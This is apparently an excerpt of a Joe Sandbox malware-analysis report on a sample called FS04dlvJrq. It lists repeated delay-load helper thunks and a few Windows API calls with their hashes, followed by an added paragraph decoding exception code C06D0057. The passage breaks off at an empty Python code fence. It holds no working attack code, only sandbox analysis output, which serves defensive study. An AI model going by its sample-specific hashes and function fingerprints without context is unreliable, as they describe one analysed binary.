                                                                                              • Instruction Fuzzy Hash: 2FB012D635E5136C3144B1485D03D77014CD1C5B10330712EF04CF54C1D4401C460231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5616b80d91fb4e11c7f9cc7ed070f28280ba2e7956c476cf6597a42813bb2f92
                                                                                              • Instruction ID: 6d545ab332fb748e11daea439d07d96ac38392f64522b2222d1202b24ea852e9
                                                                                              • Opcode Fuzzy Hash: 5616b80d91fb4e11c7f9cc7ed070f28280ba2e7956c476cf6597a42813bb2f92
                                                                                              • Instruction Fuzzy Hash: 79B012D635E6136C3284B1485D03D77054CC1C5B10330722EF04CF50C1D4411C860231
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7386fe3857b5f4d82024036f46be89b1307e8280aa0989768691330c37717db9
                                                                                              • Instruction ID: ee1ba502f3c617ec1d9abe8565d39391265ca76368e6f592615996cef07d5838
                                                                                              • Opcode Fuzzy Hash: 7386fe3857b5f4d82024036f46be89b1307e8280aa0989768691330c37717db9
                                                                                              • Instruction Fuzzy Hash: 5BB012C635E5137C3144B1485D03D77014CC1C6B10330B15EF44CF60C1D4401C480231
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00E72233
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: c0d797c189201975e2588a97136e25256407a4bb38debc2d9615da721c00961f
                                                                                              • Instruction ID: a9aed80bd8948fa75a6d3d9395c9fb88767e224f3c3cd202c7e92517b68e7eb8
                                                                                              • Opcode Fuzzy Hash: c0d797c189201975e2588a97136e25256407a4bb38debc2d9615da721c00961f
                                                                                              • Instruction Fuzzy Hash: FAC04870201200DF8704DFA9DA8CA0A77AABFA2706B91D46AF544DB032C734DC64DA25
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f0f6380ae81f123bac63ae83702235446b9ff79560d11937ceccf043547ca76a
                                                                                              • Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
                                                                                              • Opcode Fuzzy Hash: f0f6380ae81f123bac63ae83702235446b9ff79560d11937ceccf043547ca76a
                                                                                              • Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7c2ad7b56165b876a6e8c2ab069f80e78cdc44fe128cc7a9788a1f32cf31c544
                                                                                              • Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
                                                                                              • Opcode Fuzzy Hash: 7c2ad7b56165b876a6e8c2ab069f80e78cdc44fe128cc7a9788a1f32cf31c544
                                                                                              • Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4f684d22ad79a3c201ca20d678b40fc191cf58ef7c8a71d3d300be4f04836bbc
                                                                                              • Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
                                                                                              • Opcode Fuzzy Hash: 4f684d22ad79a3c201ca20d678b40fc191cf58ef7c8a71d3d300be4f04836bbc
                                                                                              • Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ba86cdec677a4189b94c9e73108b05df5b74b101fe7537a3901bcb83ea52265b
                                                                                              • Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
                                                                                              • Opcode Fuzzy Hash: ba86cdec677a4189b94c9e73108b05df5b74b101fe7537a3901bcb83ea52265b
                                                                                              • Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 87ee575212ea8a4981b0483caf15171ff4a062e66bcb27ed41c38cedc02719bb
                                                                                              • Instruction ID: 56c3254f43023adbfff679bd305c5266ff3824e618f0f3413769b08ac3dae4e5
                                                                                              • Opcode Fuzzy Hash: 87ee575212ea8a4981b0483caf15171ff4a062e66bcb27ed41c38cedc02719bb
                                                                                              • Instruction Fuzzy Hash: 7CA002D625D113BC310471555D07D77115DC4C5B51331751EF54DE50D5544458851531
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: eaf2d1b1c6a9fc79dfa97a86a4a05099f2b558115291ce95f5ab5c6d37273b84
                                                                                              • Instruction ID: de4cf87de48af5e620735c3a7ae9e1135110f30a8955a9b8ed1f5db8f9d761c7
                                                                                              • Opcode Fuzzy Hash: eaf2d1b1c6a9fc79dfa97a86a4a05099f2b558115291ce95f5ab5c6d37273b84
                                                                                              • Instruction Fuzzy Hash: 15A001E62AD222BC3108B256AE07E7B129DC8D6B21331B61EF54DF90E6A89469851631
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: f3c4d1d53ec4fe67fd148476d6923c3361da2f0c7fae21bbafcfe54d9bfc29bb
                                                                                              • Instruction ID: 8b5d23cbe215a66db79272f83032542bd72b7840d654c9d8ff8bdfc534e578ba
                                                                                              • Opcode Fuzzy Hash: f3c4d1d53ec4fe67fd148476d6923c3361da2f0c7fae21bbafcfe54d9bfc29bb
                                                                                              • Instruction Fuzzy Hash: 63A011CA3AEA23BC3008B280AE02C3A020CC0C2B20330B20EF00CF80C2A88028880230
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c512f960de307c82519ceb7bebda6961cacafb13f2052faea224274a2e0d652f
                                                                                              • Instruction ID: 610cd0b7ca7809619f9d3596d90153d054124965a4b02cb56f8ef906c64d9cdd
                                                                                              • Opcode Fuzzy Hash: c512f960de307c82519ceb7bebda6961cacafb13f2052faea224274a2e0d652f
                                                                                              • Instruction Fuzzy Hash: 79A024C735D5137C300471405D03C37010CC0C5F10330750DF00DF40C154401C440130
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 325a1a159994dac7990a21aee7027e127efc7f9870614325b553da8396288e42
                                                                                              • Instruction ID: 7e791159fee8fb7a8b3d3361d2dfe37f5389e859228c130107644bf4e94bf02e
                                                                                              • Opcode Fuzzy Hash: 325a1a159994dac7990a21aee7027e127efc7f9870614325b553da8396288e42
                                                                                              • Instruction Fuzzy Hash: 64A002D625D117BC310471515D06D76415DC4C5B51332751DF54DF54D1544418451531
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3b787e294bbf59494b98db971708f579ee6f464219050e6d958f9ea8381bfe88
                                                                                              • Instruction ID: 7e791159fee8fb7a8b3d3361d2dfe37f5389e859228c130107644bf4e94bf02e
                                                                                              • Opcode Fuzzy Hash: 3b787e294bbf59494b98db971708f579ee6f464219050e6d958f9ea8381bfe88
                                                                                              • Instruction Fuzzy Hash: 64A002D625D117BC310471515D06D76415DC4C5B51332751DF54DF54D1544418451531
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 06e0abae225484fbca9b5d8577180eab9cb437377c51001685d3c5bd49c60b8a
                                                                                              • Instruction ID: 7e791159fee8fb7a8b3d3361d2dfe37f5389e859228c130107644bf4e94bf02e
                                                                                              • Opcode Fuzzy Hash: 06e0abae225484fbca9b5d8577180eab9cb437377c51001685d3c5bd49c60b8a
                                                                                              • Instruction Fuzzy Hash: 64A002D625D117BC310471515D06D76415DC4C5B51332751DF54DF54D1544418451531
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3537856c9ff86717bd07d10291209ba9ccb385f97796aeaa907cdee06bc73a98
                                                                                              • Instruction ID: 7e791159fee8fb7a8b3d3361d2dfe37f5389e859228c130107644bf4e94bf02e
                                                                                              • Opcode Fuzzy Hash: 3537856c9ff86717bd07d10291209ba9ccb385f97796aeaa907cdee06bc73a98
                                                                                              • Instruction Fuzzy Hash: 64A002D625D117BC310471515D06D76415DC4C5B51332751DF54DF54D1544418451531
                                                                                              APIs
                                                                                              • SetDlgItemTextW.USER32(?,?,?), ref: 00E61DFC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText
                                                                                              • String ID:
                                                                                              • API String ID: 3367045223-0
                                                                                              • Opcode ID: f124e6372640b15a096ddac77e83279c8c69ec866ceae74f620ab12ffa9e5756
                                                                                              • Instruction ID: 6cd8c722acc3030d0896927b1cb9aac4ecbccfbc1e2e14d8280f4697159e7c57
                                                                                              • Opcode Fuzzy Hash: f124e6372640b15a096ddac77e83279c8c69ec866ceae74f620ab12ffa9e5756
                                                                                              • Instruction Fuzzy Hash: 8BC00271509240FFCB05CF58E948D1BBBB6FB95316F51D558F19496030C331D924DB62
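Most of the entries above are `___delayLoadHelper2@8` thunks: several share one Instruction ID and one Instruction Fuzzy Hash and differ only in Opcode ID, and every one of them reaches the same `RaiseException(C06D0057, ...)` site in subcall 00E84FCE. That is the compiler's delay-load plumbing rather than sample-specific logic, and it is worth collapsing before reading the rest of the function list. The following Python is an added example, not part of the Joe Sandbox report: it parses entries in this layout, groups them by Instruction ID, pulls the status code passed to RaiseException, and decodes it as an NTSTATUS-style value (severity, facility, code). The sample text is constructed from entries visible on this page. 0xC06D0057 decodes to severity 3 (error), facility 0x6D (FACILITY_VISUALCPP) and Win32 error 0x57 (ERROR_INVALID_PARAMETER), the code MSVC's delay-load helper raises for a delay-import descriptor it cannot use.

```python
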